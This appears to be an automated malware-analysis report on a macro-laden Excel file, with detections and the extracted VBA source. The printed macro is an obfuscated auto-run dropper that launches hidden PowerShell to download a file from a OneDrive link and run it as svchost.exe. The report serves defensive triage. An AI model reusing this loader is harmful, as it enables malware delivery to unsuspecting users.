Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file contains an obfuscated Workbook_Open macro that uses CreateObject to execute code. The macro decodes a URL and attempts to download a second-stage payload from 'http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%201126&authkey=AIuP0x-y17vWwU'. This behavior is consistent with dropper malware.
Heuristics (6)
- ClamAV: Xls.Dropper.EPPlus-9802867-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project; VBA macros present
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Artifact: macros.bas
- Kind: vba-macro
- Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
- Size: 6287 bytes
- SHA-256: 0ecb427cc8dec09d103b75ca3ef6a7dcd0787f0562326c6801d23bd397dfa280
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely; the carved artifact contains 3 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Loader "aHR0cDovL29uZWRyaXZlLmxpdmUuY29tL2Rvd25sb2FkP2NpZD0xODU3OTk1M0YyNDNEOTc5JnJlc2lkPTE4NTc5OTUzRjI0M0Q5NzklMjExMjYmYXV0aGtleT1BSXVQMHgteTE3dldZd1U="
End Sub
Function SySteM7A0OpK12VCGhAPlMN76GDHHBCHrw4PNbv_TGSFQPAL(str As String) As Variant: Dim bytes() As Byte: bytes = str: SySteM7A0OpK12VCGhAPlMN76GDHHBCHrw4PNbv_TGSFQPAL = bytes: End Function
Function ZCXVPOlPLokT5498ADSQEWp0OMCBhg_Olap6HG(bytes() As Byte) As String: Dim str As String: str = bytes: ZCXVPOlPLokT5498ADSQEWp0OMCBhg_Olap6HG = str: End Function
Function BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV(str As String) As String
Const PLAO980ARQDXVQWRAEDS_DB As String = "qg1qysdvvxlj366df"
Dim ZAGSFPLOKYHSGRETBg56tsref_BBA() As Byte, SokNAH_() As Byte
ZAGSFPLOKYHSGRETBg56tsref_BBA = SySteM7A0OpK12VCGhAPlMN76GDHHBCHrw4PNbv_TGSFQPAL(str)
CVFBy678IolPXVFSC12VbX_VCBN = SySteM7A0OpK12VCGhAPlMN76GDHHBCHrw4PNbv_TGSFQPAL(PLAO980ARQDXVQWRAEDS_DB)
Dim COCOBCV0934VCBcxvTT50opaOO0C As Long
COCOBCV0934VCBcxvTT50opaOO0C = UBound(ZAGSFPLOKYHSGRETBg56tsref_BBA)
ReDim KoSoVoBPo_(0 To COCOBCV0934VCBcxvTT50opaOO0C) As Byte
Dim idx As Long
For idx = LBound(ZAGSFPLOKYHSGRETBg56tsref_BBA) To COCOBCV0934VCBcxvTT50opaOO0C:
If Not ZAGSFPLOKYHSGRETBg56tsref_BBA(idx) = 0 Then
c = ZAGSFPLOKYHSGRETBg56tsref_BBA(idx)
For i = 0 To UBound(CVFBy678IolPXVFSC12VbX_VCBN):
c = c Xor CVFBy678IolPXVFSC12VbX_VCBN(i)
Next i
KoSoVoBPo_(idx) = c
End If
Next idx
BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV = ZCXVPOlPLokT5498ADSQEWp0OMCBhg_Olap6HG(KoSoVoBPo_)
End Function
Public Sub Loader(Link As String)
CreateObject(Aplo90VXcAzQQ2ERvcbMNploG690FXDCs5DGPWRE_PPC("57 53 63 72 69 70 74 2E 53 68 65 6C 6C")).Run (Base64Decode("cG93ZXJzaGVsbC5leGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVcgSGlkZGVuIC1jb21tYW5kIChuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJw==" & Link & "JywkZW52OlRlbXArJ1xzdmNob3N0LmV4ZScpOyhOZXctT2JqZWN0IC1jb20gU2hlbGwuQXBwbGljYXRpb24pLlNoZWxsRXhlY3V0ZSgkZW52OlRlbXArJ1xzdmNob3N0LmV4ZScp"))
End Sub
Public Function Aplo90VXcAzQQ2ERvcbMNploG690FXDCs5DGPWRE_PPC(ByVal WQEAds908766VCQRETPlmBBvCXv0PlZCXBTreFGSTO88867FXVSF_XX As String) As String
Dim ADZpo985TFSRd8trsRReVXCvMNZ As String
Dim PAloBCv56XCzBVghAREq89Nm As String
Dim rno5s33dvhaypouve As Long
For PLxvGGNbYTASDZp90FGXWqZAmLLPFXGo89CX = 1 To Len(WQEAds908766VCQRETPlmBBvCXv0PlZCXBTreFGSTO88867FXVSF_XX) Step 3
wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa = chr$(Val(BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV(chr(81) & "?" & "") & Mid$(WQEAds908766VCQRETPlmBBvCXv0PlZCXBTreFGSTO88867FXVSF_XX, PLxvGGNbYTASDZp90FGXWqZAmLLPFXGo89CX, 2)))
ygovl6cr2igluj12f = ygovl6cr2igluj12f & wSyzXMLHWUSHvLYkKMMXYQvilaCUFhOtEcxHOMzjKQAtRrAJPgqiIRa
Next PLxvGGNbYTASDZp90FGXWqZAmLLPFXGo89CX
Aplo90VXcAzQQ2ERvcbMNploG690FXDCs5DGPWRE_PPC = ygovl6cr2igluj12f
End Function
Function Base64Decode(ByVal base64String)
Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim dataLength, sOut, groupBegin
base64String = Replace(base64String, vbCrLf, "")
base64String = Replace(base64String, vbTab, "")
base64String = Replace(base64String, BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV(chr(87)), "")
dataLength = Len(base64String)
If dataLength Mod 4 <> 0 Then
Err.Raise 1, BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV("5" & "" & " " & "" & " " & "" & chr(18) & "" & chr(65) & "" & "C" & "" & chr(51) & chr(18) & "" & chr(20) & chr(24) & "" & chr(19) & chr(18)), BvcXCvIoPAFSMLpoBCVPZASGDFIUYQWRAEDS_CV(chr(53) & "" & chr(22) & chr(19) & "" & "W" & "" & chr(53) & "" &
```
... (truncated)
Artifact: vbaProject_00.bin
- Kind: vba-project
- Source: OOXML VBA project: xl/vbaProject.bin
- Size: 7168 bytes
- SHA-256: 70fcf234563229aeb8184a86608ab6d09d26f5c7878117ae5ee9941d305a0771
- Detection (ClamAV): Xls.Dropper.EPPlus-9802867-2
- Obfuscation or payload: unlikely